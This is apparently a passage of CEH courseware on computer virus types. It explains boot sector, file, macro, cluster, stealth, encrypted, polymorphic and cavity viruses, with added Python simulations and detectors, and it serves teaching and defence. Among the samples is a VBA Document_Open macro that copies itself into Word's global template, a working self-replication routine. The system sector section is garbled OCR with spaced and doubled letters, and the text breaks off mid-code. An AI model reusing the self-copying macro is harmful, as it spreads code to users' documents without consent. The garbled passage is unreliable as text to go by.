The most common targets for a virus are the system sectors, which are nothing but the Master Boot Record and the DOS Boot Record system sectors. These are the areas on the disk that are executed when the PC is booted. Every disk has a system sector of some sort. They specially infect the floppy boot sectors and records of the hard disk. For example: Disk Killer and Stone virus.
File Viruses
Executable files are infected by file viruses, as they insert their code into the original file and get executed. File viruses are larger in number, but they are not the most commonly found. They infect in a variety of ways and can be found in a large number of file types.
Multipartite Virus
They infect program files, and this file in turn affects the boot sectors, such as Invader, Flip, and Tequila.
Cluster Viruses
Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program.
Macro Virus
Microsoft Word or a similar application can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else. Macro viruses are somewhat less harmful than other types. They are usually spread via an email.
How Do They Infect?
Stealth Viruses
These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations in respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.
Tunneling Viruses
These viruses trace the steps of interceptor programs that monitor operating system requests so that they get into BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.
Encryption Viruses
This type of virus consists of an encrypted copy of the virus and a decryption module. The decrypting module remains constant, whereas different keys are used for encryption.
Polymorphic Viruses
These viruses were developed to confuse antivirus programs that scan for viruses in the system. It is difficult to trace them, since they change their characteristics each time they infect, e.g., every copy of this virus differs from its previous one. Virus developers have even created metamorphic engines and virus-writing toolkits that make the code of an existing virus look different from others of its kind.
Metamorphic Viruses
Code that can reprogram itself is called metamorphic code. This code is translated into temporary code, and then converted back to the normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. This is more effective in comparison to polymorphic code. This type of virus consists of complex, extensive code.
Overwriting File or Cavity Viruses
Some program files have areas of empty space. This empty space is the main target of these viruses. The Cavity Virus, also known as the Space Filler Virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the original code. It installs itself in the file it attempts to infect.
Sparse Infector Viruses
A sparse infector virus infects only occasionally (e.g., every tenth program executed) or only files whose lengths fall within a narrow range.
Companion Viruses
The companion virus stores itself by having the identical file name as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified.
Camouflage Viruses
They disguise themselves as genuine applications of the user. These viruses are not difficult to find since antivirus programs have advanced to the point where such viruses are easily traced.
Shell Viruses
This virus code forms a layer around the target host program's code that can be compared to an "eggshell," making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.
File Extension Viruses
File extension viruses change the extensions of files; .TXT is safe, as it indicates a pure text file. If your computer's file extensions view is turned off and someone sends you a file named BAD.TXT.VBS, you will see only BAD.TXT.
Add-on Viruses
Most viruses are add-on viruses. This type of virus appends its code to the beginning of the host code without making any changes to the latter. Thus, the virus corrupts the startup information of the host code and places itself in its place, but it does not touch the host code. However, the virus code is executed before the host code. The only indication that the file is corrupted is that the size of the file has increased.
Intrusive Viruses
This form of virus overwrites its code either by completely removing the target host's program code, or sometimes it only overwrites part of it. Therefore, the original code is not executed properly.
Direct Action or Transient Viruses
Transfers all control to the host code where it resides, selects the target program to be modified, and corrupts it.
Terminate and Stay Resident Viruses (TSRs)
A TSR virus remains permanently in memory during the entire work session, even after the target host program is executed and terminated. It can be removed only by rebooting the system.
System or Boot Sector Viruses
Boot Sector Virus
- Boot sector virus moves the MBR to another location on the hard disk and copies itself to the original location of the MBR
- When the system boots, the virus code is executed first and then control is passed to the original MBR
(Diagram: Before Infection / After Infection, showing Virus Code and MBR)
S y s t e m o r B oo oo t S e c t o r V i r u s e s m
S y s t e m s e c t o r v ir ir u s e s ca ca n b e d e f i n e d a s t h o s e t h a t a f f e c t t h e e x e c u t a b l e c o d e o f t h e
d is is k , r a t h e r t h a n t h e b o o t s e c t o r v ir i r u s t h a t a f f e c t s t h e D OS OS b o o t s e c t o r o f th th e d is is k . A n y s y s t e m is divided into areas, called sectors, where the programs are stored. T h e t w o t y p e s o f s y s t e m s e c t o r s ar ar e : Q
M B R ( M a s t e r B o o t R ec ec o r d )
MBRs are the m ost virus-p rone zone ess b e c a u s e i f t h e M B R i s c o r r u p t e d , a l l d a t a w i l l b e lost. 0
D B R ( D OS OS B o o t R e c o r d )
T h e D O S b o o t s e c t o r is is e x e c u t e d w h e n e v e r t h e s y s t e m i s b o o t e d . T h is is is is t h e c r u c i a l p o i n t o f a t t a c k f o r v i ru r u s es es . T h e s y s t e m s e c t o r c o n s is is t s o f 5 1 2 b y t e s o f m e m o r y . B e ca ca u sse e o f t h i s , s y s te t e m s e c t o r v i ru ru s e s conceal their code in some other disk space. The main carrier of system sector viruses is the f l o p p y d i sk sk . T h es es e v i r u s e s g e n e r a l l y r e s i d e i n t h e m e m o r y . T h e y c a n a l so so b e c a u s e d b y T r o ja ja n s . S o m e s e c t o r v ir i r u s e s al al s o s p r e a d t h r o u g h i n f e c t e d f i le l e s , a nd n d t h e y a r e ca c a l le le d m u l t i p a r t v i r u s e s .
Module 07 Page 1038
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures: Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Virus Removal

System sector viruses are designed to create the illusion that there is no virus on the system: a resident infector that intercepts disk reads can present the clean original sector to anything that asks for it. The courseware offers two approaches. The first, avoiding Windows in favour of Linux or a Mac, helps only because classic boot sector viruses were written for the DOS/Windows boot chain; it is not a built-in safeguard, and the boot code of any platform can be attacked by code written for it. The second, and the one to rely on, is to carry out antivirus checks on a periodic basis, ideally after booting from known-clean, write-protected media so that a resident virus is not running while the disk is examined.

FIGURE 7.6: System or Boot Sector Viruses
File and Multipartite Viruses

File Viruses

File viruses infect files that are executed or interpreted by the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. A file virus can be either direct-action (non-resident) or memory-resident. Overwriting viruses cause irreversible damage to the files they infect, because the original code is destroyed rather than moved. File viruses have targeted a range of operating systems, including Windows, UNIX, DOS, and Macintosh.
Characterizing File Viruses

File viruses are mainly characterized and described by their physical behaviour or characteristics. One way to classify a file virus is by the type of file it targets, such as EXE or COM files. A file virus can also be characterized by how it infects the targeted file (the host file):

- Prepending: writes itself into the beginning of the host file's code
- Appending: writes itself to the end of the host file
- Overwriting: overwrites the host file's code with its own code
- Inserting: inserts itself into gaps inside the host file's code
- Companion: renames the original file and writes itself under the host file's name
- Cavity infector: writes itself between the sections of a 32-bit file

File viruses are also classified by whether they are non-memory-resident or memory-resident. Non-memory-resident viruses search the hard drive for EXE files and infect them on the spot, whereas memory-resident viruses stay active in memory, trap one or more system functions, and infect files as the system touches them.

File viruses may be non-encrypted, encrypted, or polymorphic. An encrypted or polymorphic virus consists of one or more decryptors and a main body; the decryptor decrypts the body before it starts. An encrypted virus uses a decryptor with a fixed or variable key, so the decryptor itself looks the same from one infection to the next, whereas a polymorphic virus generates a new decryptor for each infection from the processor's instruction set, padded with many instructions that play no part in the decryption.

Execution of payload:
- Direct action: immediately upon execution
- Time bomb: after a specified period of time
- Condition triggered: only under certain conditions
Multipartite Viruses

A multipartite virus, also known as a multi-part virus, attacks both the boot sector and executable or program files. When the virus attaches to the boot sector, it goes on to infect the system's files; when it attaches to files, it in turn infects the boot sector, so either route re-establishes the other.
FIGURE 7.7: File and Multipartite Viruses
Macro Viruses

- A macro virus infects macro-enabled documents; in the typical scenario an attacker sends the document to a user, who opens it.
- Macro viruses infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files.
- Most macro viruses are written in the macro language Visual Basic for Applications (VBA).
Macro Viruses

Microsoft Word and similar applications can be infected by a macro virus, a macro that automatically performs a sequence of actions when the application, or an event within it such as opening or closing a document, triggers it. Most macro viruses are written in Visual Basic for Applications (VBA). They infect templates, or convert infected documents into template files, while maintaining their appearance of ordinary document files; because the global template is loaded with every document, a virus that reaches it runs every time the application starts. Macro viruses are often considered less harmful than other types, but they spread very effectively, usually via email. Pure data files cannot carry a virus, but the extensive macro languages in some programs blur the line between a data file and an executable, and the average user easily overlooks the distinction. That line disappears entirely where default macros are set to run automatically every time the data file is loaded, which is exactly the case virus writers exploit in programs with macro capability such as Microsoft Word, Excel, and other Office applications. Windows Help files can also contain macro code, and the full version of Acrobat, which reads and writes PDF files, has scripting that has likewise been exploited.
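The two behaviours that make a macro a virus, an auto-executing entry point and a copy of itself planted into a template, can both be spotted in VBA source. The scanner below is an added example, not part of the courseware. The auto-execute procedure names are Word's and Excel's documented ones; the "template spreading" strings are the usual tell-tale API names and are a heuristic assumption rather than a complete list. The two VBA modules are constructed for the demo and are not real malware.

```python
"""Heuristics for the two macro-virus behaviours the text describes.

Added example, not part of the courseware. A macro becomes a virus when (1) it
is wired to an auto-executing entry point so it runs whenever the document is
opened or closed, and (2) it copies itself into a template (classically the
global template, Normal.dot) so later documents inherit it. The auto-execute
names are Word's and Excel's documented ones; TEMPLATE_SPREAD_MARKERS is a
heuristic assumption, not a complete list. Both VBA modules are constructed.
"""
import re

AUTO_EXEC_NAMES = {
    # Word auto macros and document events
    "AutoExec", "AutoOpen", "AutoClose", "AutoNew", "AutoExit",
    "Document_Open", "Document_Close", "Document_New",
    # Excel equivalents
    "Auto_Open", "Auto_Close", "Workbook_Open", "Workbook_BeforeClose",
}

# Heuristic: API names used to plant macros into templates or other documents.
TEMPLATE_SPREAD_MARKERS = (
    "NormalTemplate", "VBProject", "VBComponents", "MacroCopy",
    "Organizer", "wdFormatTemplate", "AttachedTemplate",
)

PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)", re.I | re.M)


def auto_exec_procedures(vba_source: str) -> list:
    """Names of procedures the host application runs without the user asking."""
    wanted = {n.lower() for n in AUTO_EXEC_NAMES}
    return sorted({n for n in PROC_RE.findall(vba_source) if n.lower() in wanted})


def template_spread_markers(vba_source: str) -> list:
    lowered = vba_source.lower()
    return [m for m in TEMPLATE_SPREAD_MARKERS if m.lower() in lowered]


def assess(vba_source: str) -> dict:
    auto = auto_exec_procedures(vba_source)
    spread = template_spread_markers(vba_source)
    # Both together is the self-replication pattern; either alone is only
    # suspicious (plenty of legitimate templates use AutoOpen).
    if auto and spread:
        verdict = "macro virus pattern"
    elif auto or spread:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"auto_exec": auto, "spread_markers": spread, "verdict": verdict}


# Constructed samples (not real malware).
BENIGN_MODULE = """
Sub FormatReport()
    Selection.Font.Bold = True
End Sub
"""

SUSPICIOUS_MODULE = """
Private Sub Document_Open()
    Dim src, dst
    Set src = ActiveDocument.VBProject.VBComponents("ThisDocument")
    Set dst = NormalTemplate.VBProject.VBComponents("ThisDocument")
    dst.CodeModule.AddFromString src.CodeModule.Lines(1, src.CodeModule.CountOfLines)
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatTemplate
End Sub
"""
```

In practice the VBA source is extracted from the document container first (for example with a macro-extraction tool); the text here assumes it is already available as a string.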
FIGURE 7.8: Macro Viruses (an attacker sends a macro-enabled document; opening it infects the user's system)
Cluster Viruses

- Cluster viruses modify directory table entries so that they point users or system processes to the virus code instead of the actual program.
- There is only one copy of the virus on the disk, yet it infects every program on the computer system.
- The virus launches first whenever any program on the system is started, and then passes control to the actual program.
Cluster Viruses

Cluster viruses infect files without changing the files or planting extra files; instead they change the DOS directory information so that directory entries point to the virus code instead of to the actual program. When a program is run under DOS, the system first loads and executes the virus code, and the virus then locates the actual program and executes it. Dir-2 is an example of this type of virus. Because every infected directory entry points at the same cluster, there is only one copy of the virus on the disk, yet it infects all the programs on the computer system; it launches first when any program is started and then passes control to the actual program. Since the files themselves are untouched, a scanner that reads files by name through the infected system sees nothing wrong, while a disk-level check from clean media (CHKDSK, for instance) reports the affected entries as cross-linked files, because many files appear to start in the same cluster.
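The following simulation is an added example, not code from the courseware. It models a FAT-style volume in memory (a cluster holds bytes, a directory entry maps a name to its start cluster) and shows the three properties the text states: one copy of the virus on disk, every executable redirected to it with the real program still run afterwards, and a disk-level check that exposes the infection without knowing the virus. File names and contents are made up.

```python
"""Directory-table (cluster) infection, simulated on a FAT-style volume.

Added example, not part of the courseware. The volume, its files and the
"virus" are in-memory stand-ins. "Running" a file means loading whatever
cluster its directory entry points at, which is what DOS does.
"""

VIRUS_MAGIC = b"DIR2-SIM:"   # marks the single virus cluster (constructed)


class Volume:
    def __init__(self):
        self.clusters = {}    # cluster number -> contents
        self.directory = {}   # file name -> start cluster
        self.next_free = 2    # FAT data area begins at cluster 2

    def write_file(self, name: str, data: bytes) -> int:
        c = self.next_free
        self.next_free += 1
        self.clusters[c] = data
        self.directory[name] = c
        return c


def infect_directory(vol: Volume) -> int:
    """Plant one virus cluster and point every .EXE/.COM entry at it. The real
    start clusters are kept in a small table inside the virus cluster so the
    virus can still hand control to the genuine program."""
    originals = {n: c for n, c in vol.directory.items()
                 if n.upper().endswith((".EXE", ".COM"))}
    table = ";".join(f"{n}={c}" for n, c in sorted(originals.items())).encode()
    virus_cluster = vol.next_free
    vol.next_free += 1
    vol.clusters[virus_cluster] = VIRUS_MAGIC + table
    for n in originals:
        vol.directory[n] = virus_cluster       # the file's own bytes are untouched
    return virus_cluster


def run(vol: Volume, name: str) -> list:
    """What happens when the user starts NAME. Returns what actually executed."""
    trace = []
    data = vol.clusters[vol.directory[name]]
    if data.startswith(VIRUS_MAGIC):
        trace.append("virus")
        table = dict(kv.split("=", 1)
                     for kv in data[len(VIRUS_MAGIC):].decode().split(";") if kv)
        data = vol.clusters[int(table[name])]   # virus passes control to the real program
    trace.append(data.decode())
    return trace


def shared_start_clusters(vol: Volume) -> dict:
    """Disk-level check needing no knowledge of the virus: on a healthy volume no
    two files start in the same cluster. Entries that do are what CHKDSK
    reports as cross-linked files."""
    by_cluster = {}
    for n, c in vol.directory.items():
        by_cluster.setdefault(c, []).append(n)
    return {c: sorted(ns) for c, ns in by_cluster.items() if len(ns) > 1}


def virus_copies(vol: Volume) -> int:
    return sum(1 for d in vol.clusters.values() if d.startswith(VIRUS_MAGIC))


def build_demo_volume() -> Volume:
    vol = Volume()
    vol.write_file("NOTEPAD.EXE", b"notepad body")   # constructed contents
    vol.write_file("EDIT.COM", b"edit body")
    vol.write_file("README.TXT", b"readme text")
    return vol
```

Note that the check must be run with the virus not resident: a resident Dir-2 also intercepts directory reads and shows the original cluster numbers, so the same cold-boot rule given later for stealth viruses applies here.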
Stealth/Tunneling Viruses

- These viruses evade antivirus software by intercepting its requests to the operating system.
- A virus can hide itself by intercepting the antivirus software's request to read a file and handling the request itself instead of passing it to the OS.
- The virus then returns an uninfected version of the file to the antivirus software, so that the file appears to be "clean".
- In the figure, the antivirus asks for the system file TCPIP.SYS; the virus hides the infected TCPIP.SYS and hands back the original.
Stealth/Tunneling Viruses

Stealth Viruses

These viruses try to hide from antivirus programs by actively altering the service call interrupts they have chosen while they are running. Requests made through those interrupts are handled by the virus code, which reports false information to hide the virus's presence; for example, a stealth virus hides the operations it has modified and returns a false picture of the file or sector. In this way it takes over portions of the target system and conceals its own code. A stealth virus hides from antivirus software by reporting the original size of an infected file, or by temporarily keeping a copy of the clean file elsewhere on the system and substituting that stored uninfected copy whenever the infected file is read.

A stealth virus hides the modifications that it makes. It takes control of the system functions that read files or system sectors and, when another program requests information that the virus has already modified, reports the original information to the requesting program instead. The virus also resides in memory; to avoid detection it must take over the relevant system functions and use them to hide its presence, which is also why it cannot hide from a scan performed after booting from clean media, when none of its hooks are in place.
One carrier of stealth viruses is the rootkit. Installing a rootkit generally results in this kind of attack, because rootkits are installed via Trojans and are capable of hiding any malware.

Removal:

- Always do a cold boot (boot from a write-protected floppy disk or CD) so that the virus is not resident while you examine the disk.
- Never use DOS commands such as FDISK to "fix" the virus: some boot sector viruses relocate or encrypt the partition table, and blindly rewriting the MBR can leave the disk unbootable or the data unreachable.
- Use antivirus software.

Tunneling Viruses

These viruses trace the chain of interceptor programs that monitor operating system requests, so that they can reach the original BIOS and DOS entry points directly and install themselves there. To do this they tunnel beneath antivirus monitors, calling the original handlers and bypassing the antivirus hooks entirely.
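The cold-boot rule above works because a stealth virus's lies exist only in the hooked read path; the bytes on disk are still infected. The simulation below is an added example, not code from the courseware: `Disk.raw_read` is the view a clean boot gives you, `StealthHook.read` is the hooked service a resident virus offers to everything else (the antivirus included), and the cross-view comparison at the end is the generic way to expose such a hook without knowing the virus's signature. File names and contents are made up.

```python
"""Stealth hooking and cross-view detection.

Added example, not part of the courseware. In-memory simulation with made-up
file names: raw_read() is what is really on disk (the cold-boot view) and
StealthHook.read() is the intercepted read service the resident virus serves.
"""
import hashlib

INFECTION_MARKER = b"[VX]"   # stand-in for the virus body prepended to a host


class Disk:
    def __init__(self, files: dict):
        self.files = dict(files)          # name -> bytes actually stored

    def raw_read(self, name: str) -> bytes:
        return self.files[name]


class StealthHook:
    """Resident virus: infects on demand, lies about infected files on read."""

    def __init__(self, disk: Disk):
        self.disk = disk
        self.originals = {}               # clean copies served to anyone who asks

    def infect(self, name: str) -> None:
        if name not in self.originals:
            self.originals[name] = self.disk.files[name]
            self.disk.files[name] = INFECTION_MARKER + self.originals[name]

    def read(self, name: str) -> bytes:
        # For an infected file the request never reaches the OS.
        return self.originals.get(name, self.disk.files[name])

    def size(self, name: str) -> int:
        return len(self.read(name))      # the size growth is hidden as well


def signature_scan(read, names) -> list:
    """Naive scan: look for the marker in whatever `read` returns."""
    return [n for n in names if INFECTION_MARKER in read(n)]


def cross_view_scan(live_read, offline_read, names) -> list:
    """Flag files whose hooked (live) view and raw (offline) view differ."""
    def digest(b):
        return hashlib.sha256(b).hexdigest()
    return [n for n in names if digest(live_read(n)) != digest(offline_read(n))]


def demo() -> dict:
    disk = Disk({"TCPIP.SYS": b"MZ tcpip driver", "NOTEPAD.EXE": b"MZ notepad"})
    virus = StealthHook(disk)
    virus.infect("TCPIP.SYS")
    names = sorted(disk.files)
    return {
        "online_scan": signature_scan(virus.read, names),        # through the hook: fooled
        "offline_scan": signature_scan(disk.raw_read, names),    # after a cold boot
        "cross_view": cross_view_scan(virus.read, disk.raw_read, names),
        "reported_size": virus.size("TCPIP.SYS"),
        "true_size": len(disk.raw_read("TCPIP.SYS")),
    }
```

The offline view on a real system is obtained by mounting the disk from rescue media, or by reading raw sectors rather than going through the file API the virus has hooked.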
FIGURE 7.9: Working of Stealth/Tunneling Viruses (the antivirus software asks for the system file TCPIP.SYS; the virus hides the infected TCPIP.SYS and returns the original)
Encryption Viruses

- This type of virus uses simple encryption to encipher its code.
- The virus body is encrypted with a different key for each infected file.
- An AV scanner cannot directly detect these viruses with a signature on the body, because the encrypted body differs in every copy.
Encryption Viruses

This type of virus consists of an encrypted copy of the virus body and a decryption module. The decryption module remains constant, whereas a different key is used for each infection. These viruses generally XOR each byte with a randomized key.

- The virus as stored on disk consists of a decryption module and an encrypted copy of the virus code.
- For each infected file, the virus body is encrypted with a different key, but the decryption module remains unchanged. A virus scanner therefore cannot detect the virus body directly by means of signatures, but the decryption module can be detected; this weakness is what polymorphic viruses were written to remove.
- The decryption technique employed is to XOR each byte with a randomized key that is generated and saved, alongside the encrypted body, by the parent virus at infection time.
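The asymmetry just described, a body that never matches and a decryptor that always does, is easy to show concretely. The block below is an added example, not code from the courseware. The stub bytes are illustrative stand-ins for a decryptor loop (not tested machine code) with the key immediate sitting between them, and the virus body is a made-up string; the XOR loop is the one the text describes.

```python
"""Encrypted virus: constant decryptor, per-infection XOR key.

Added example, not from the courseware. STUB_PREFIX/STUB_SUFFIX are
illustrative bytes standing in for the decryptor loop (not tested machine
code); the key immediate sits between them. VIRUS_BODY is made up.
"""
import random

STUB_PREFIX = b"\xbe\x00\x01\xb9\x36\x00\x80\x34"   # stand-in: set pointer/count, xor [si], imm8
STUB_SUFFIX = b"\x46\xe2\xfa\xeb\x05"               # stand-in: inc si ; loop ; jmp body
VIRUS_BODY = b"virus body: find the next host, attach a copy, check the trigger"


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def make_infection(body: bytes, key: int) -> bytes:
    """One infected copy: decryptor (constant except the key byte) + body XORed under key."""
    if not 1 <= key <= 255:
        raise ValueError("key must be 1..255; key 0 would leave the body in clear")
    return STUB_PREFIX + bytes([key]) + STUB_SUFFIX + xor_bytes(body, key)


def run_infected(sample: bytes) -> bytes:
    """What happens at load time: the stub reads its key and recovers the body."""
    key = sample[len(STUB_PREFIX)]
    body_at = len(STUB_PREFIX) + 1 + len(STUB_SUFFIX)
    return xor_bytes(sample[body_at:], key)


def body_signature_hits(samples, body_sig: bytes) -> int:
    """Plain byte signature taken from the decrypted body."""
    return sum(1 for s in samples if body_sig in s)


def decryptor_signature_hits(samples) -> int:
    """Wildcarded signature: prefix, any one byte (the key), suffix."""
    p, q = len(STUB_PREFIX), len(STUB_SUFFIX)
    return sum(1 for s in samples
               if s[:p] == STUB_PREFIX and s[p + 1:p + 1 + q] == STUB_SUFFIX)


def generation(n: int, seed: int = 1) -> list:
    """n infections with distinct random keys, as a parent virus would produce."""
    keys = random.Random(seed).sample(range(1, 256), n)
    return [make_infection(VIRUS_BODY, k) for k in keys]
```

The wildcard in `decryptor_signature_hits` is the same idea AV engines use for this class: match the invariant stub and skip the byte that carries the key.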
FIGURE 7.10: Working of Encryption Viruses (one virus body, encrypted under a different key in each of three infected files)
Polymorphic Code

- Polymorphic code is code that mutates while keeping the original algorithm intact.
- To produce polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or mutation engine).
- A well-written polymorphic virus therefore has no parts that stay the same on each infection.
- In the figure, the user runs an infected program; in RAM the decryptor routine decrypts the virus code and the encrypted mutation engine, and a new polymorphic copy of the virus is produced.
Polymorphic Code

Polymorphic viruses modify their code for each replication in order to avoid detection. They accomplish this by changing the encryption module and the instruction sequence; a random number generator drives the changes. A mutation engine is generally used to produce the polymorphic code. The mutator emits a different sequence of instructions for every copy, so a virus scanner cannot rely on a fixed byte signature and must instead use generic decryption (emulating the decryptor until the constant body appears) or an algorithmic description of the engine. Slow polymorphic viruses mutate only rarely, so that bait files infected during a single run all contain near-identical copies and antivirus researchers have difficulty collecting the variety of samples needed to write a reliable detection. On a system, a simple integrity checker (a baseline of file hashes compared against the current disk) detects the presence of a polymorphic virus regardless of how the copies look, because the infected hosts have changed.
FIGURE 7.11: How Polymorphic Code Works (the user runs an infected program; the decryptor routine decrypts the virus code and the encrypted mutation engine in RAM; the virus does its damage and produces a new polymorphic copy)
Polymorphic viruses consist of three components: the encrypted virus code, the decryptor routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus code; it does so only after taking control of the computer. The mutation engine generates randomized decryption routines, and the decryption routine varies every time a new program is infected by the virus.

With a polymorphic virus, both the mutation engine and the virus code are encrypted. When a program infected with a polymorphic virus is run by the user, the decryptor routine takes control of the system and decrypts the virus code and the mutation engine. Control is then transferred by the decryption routine to the virus, which locates a new program to infect. In RAM, the virus makes a replica of itself as well as of the mutation engine. It then instructs the mutation engine to generate a new randomized decryption routine capable of decrypting the virus. The virus encrypts this new copy of both the virus code and the mutation engine under a fresh key, and appends the new decryption routine, the newly encrypted virus code, and the encrypted mutation engine (EME) to the new program, thereby continuing the process.

Polymorphic viruses spread by an attacker in targeted systems are difficult to detect because the virus body is encrypted and the decryption routine changes from infection to infection, so no two infections look the same; this makes it hard for a virus scanner to identify the virus with a byte signature.
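The following is an added example, not code from the courseware, that puts a toy mutation engine beside the detections discussed above. The engine varies the register choice, inserts do-nothing junk instructions and picks a fresh XOR key for every infection; the byte values are illustrative stand-ins for x86 encodings, not tested machine code, and the host programs are made-up strings. Three detections are tried against its output: a signature on the plaintext body (fails), a signature on the one fragment this toy never rewrites (succeeds, which is exactly why a real engine also mutates the loop itself), and a hash baseline of the hosts (succeeds regardless of how the copies look).

```python
"""Polymorphic decryptors and why integrity checking still works.

Added example, not from the courseware. Byte values are illustrative stand-ins
for x86 encodings, not tested machine code; hosts are made-up strings.
"""
import hashlib
import random

BODY = b"polymorphic virus body (stand-in for the real code)"

LOAD_KEY = (b"\xb0", b"\xb3", b"\xb1")   # "mov al/bl/cl, imm8": interchangeable for this toy
JUNK = (b"\x90", b"\xf8", b"\xfc", b"\x87\xc0", b"\x89\xc0")   # nop, clc, cld, xchg ax,ax, mov ax,ax
LOOP = b"\x30\x07\x47\xe2"               # the xor/inc/loop core this toy engine never varies


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def mutation_engine(rng: random.Random, key: int) -> bytes:
    """One decryptor variant: load key, 0-4 junk instructions, loop core, and a
    loop displacement byte that depends on how much junk was inserted."""
    junk = [rng.choice(JUNK) for _ in range(rng.randint(0, 4))]
    parts = [rng.choice(LOAD_KEY), bytes([key])] + junk + [LOOP]
    parts.append(bytes([0xFF - sum(len(j) for j in junk) - 2]))  # illustrative displacement
    return b"".join(parts)


def infect(host: bytes, rng: random.Random) -> bytes:
    key = rng.randint(1, 255)
    return host + mutation_engine(rng, key) + xor_bytes(BODY, key)


def generic_decrypt(infected: bytes, host_len: int) -> bytes:
    """A scanner that cannot match the mutated decryptor can still 'run' it
    (generic decryption): read the key, skip to the loop end, decrypt the body."""
    key = infected[host_len + 1]
    loop_at = infected.index(LOOP, host_len)
    return xor_bytes(infected[loop_at + len(LOOP) + 1:], key)


def signature_hits(samples, sig: bytes) -> int:
    return sum(1 for s in samples if sig in s)


def distinct_decryptors(samples, host_lens) -> int:
    decryptors = set()
    for s, hl in zip(samples, host_lens):
        decryptors.add(s[hl:s.index(LOOP, hl) + len(LOOP) + 1])
    return len(decryptors)


def integrity_check(baseline: dict, current: dict) -> list:
    """Names whose SHA-256 no longer matches the recorded baseline."""
    return sorted(n for n, data in current.items()
                  if hashlib.sha256(data).hexdigest() != baseline.get(n))


def demo(n: int = 12, seed: int = 7) -> dict:
    rng = random.Random(seed)
    hosts = {f"PROG{i:02d}.EXE": f"MZ host program {i}".encode() for i in range(n)}  # constructed
    baseline = {name: hashlib.sha256(data).hexdigest() for name, data in hosts.items()}
    infected = {name: infect(data, rng) for name, data in hosts.items()}
    samples = list(infected.values())
    host_lens = [len(hosts[name]) for name in infected]
    return {
        "recovered_all": all(generic_decrypt(s, hl) == BODY for s, hl in zip(samples, host_lens)),
        "body_sig_hits": signature_hits(samples, BODY[:16]),
        "invariant_sig_hits": signature_hits(samples, LOOP),
        "distinct_decryptors": distinct_decryptors(samples, host_lens),
        "integrity_flagged": integrity_check(baseline, infected),
        "names": sorted(hosts),
    }
```

The `invariant_sig_hits` result is the practical lesson: any fragment an engine fails to mutate becomes the signature, so real engines rewrite the loop, the register usage and the instruction order as well, and scanners fall back on emulation or on integrity baselines such as `integrity_check`.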
Metamorphic Viruses

- Metamorphic viruses rewrite themselves completely each time they infect a new executable.
- Metamorphic code can reprogram itself by translating its own code into a temporary representation and then back into normal code again.
- For example, W32/Simile consisted of over 14,000 lines of assembly code, 90% of it part of the metamorphic engine.
- The figure shows the payload message of the Simile (Metaphor) variants: a.) Variant A, b.) Variant B, c.) the "unofficial" Variant C, and d.) the .D variant (which was the "official" C of the original author).
Metamorphic Viruses

Some viruses rewrite themselves completely to infect each newly executed file. Such viruses are complex and use a metamorphic engine to do the rewriting. Code that can reprogram itself is called metamorphic code: it is translated into a temporary intermediate representation and then converted back into executable code that differs from the original. This technique, in which the original algorithm remains intact while its encoding changes, is used to avoid pattern recognition by antivirus software, and it is more effective than polymorphic code because there is no constant decrypted body for a scanner to find once the outer layer is unwrapped. The price is that this type of virus consists of complex and extensive code.

The commonly known metamorphic viruses are:

Win32/Simile: This virus is written in assembly language and targets Microsoft Windows. The metamorphic process is complex, and nearly 90% of the virus's code belongs to the engine that performs it.

Zmist: Zmist, also known as Z0mbie.Mistfall, was the first virus to use the technique called "code integration". It disassembles the host, inserts its own code between the host's instructions, regenerates the code, and rebuilds the executable.
FIGURE 7.12: Metamorphic Viruses Screenshot (payload text of the Simile/Metaphor variants: a.) Variant A, b.) Variant B, c.) the "unofficial" Variant C, d.) the .D variant, which was the "official" C of the original author)
File Overwriting or Cavity Viruses

- A cavity virus writes itself into a region of the host file that is filled with a constant (usually nulls), without increasing the length of the file and while preserving its functionality.
- In the figure, a 45 KB file containing text followed by a long run of null padding is infected; the infected file is still 45 KB, because the virus occupies the null-filled cavity.
File Overwriting or Cavity Viruses

These are also known as space-fillers, since they maintain a constant file size when they infect by installing themselves inside the target program rather than growing it. Viruses that append themselves to the end of a file and patch its start, or that simply overwrite the start of the file, are the ordinary appending and overwriting infectors; what distinguishes a cavity infector is that the host's size does not change. In either case, when the host is started the virus code is activated and executed first, and the original application afterwards.

Some program files have areas of empty space, for example padding between sections. This empty space is the main target of these viruses. The cavity virus, also known as the space filler virus, stores its code in this empty space and installs itself there without destroying any of the original code, then redirects execution so that it runs before the host.

This type of virus is rare because it is difficult to write: the virus must find a cavity large enough for its whole body and must not disturb the surrounding code. The Windows Portable Executable (PE) format, designed for fast loading of programs, aligns its sections on fixed boundaries and so leaves padding gaps that a space filler can use. The best-known member of this family is the CIH virus.
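The size-preserving property is what defeats the naive integrity check. The block below is an added example, not code from the courseware: the host is a constructed stand-in for a sectioned executable, with two "sections" each padded with nulls up to a 512-byte alignment boundary, which is the kind of gap the text says a space filler uses. The infector finds a null run large enough for its payload and writes itself there; the entry-point redirection a real cavity virus also performs is left out. The report at the end shows why a size-only check misses the infection and a content hash does not.

```python
"""Cavity (space-filler) infection: same size before and after.

Added example, not from the courseware. The host is a constructed stand-in
for a sectioned executable; PAYLOAD is made-up filler for the virus body.
Entry-point redirection is omitted.
"""
import hashlib

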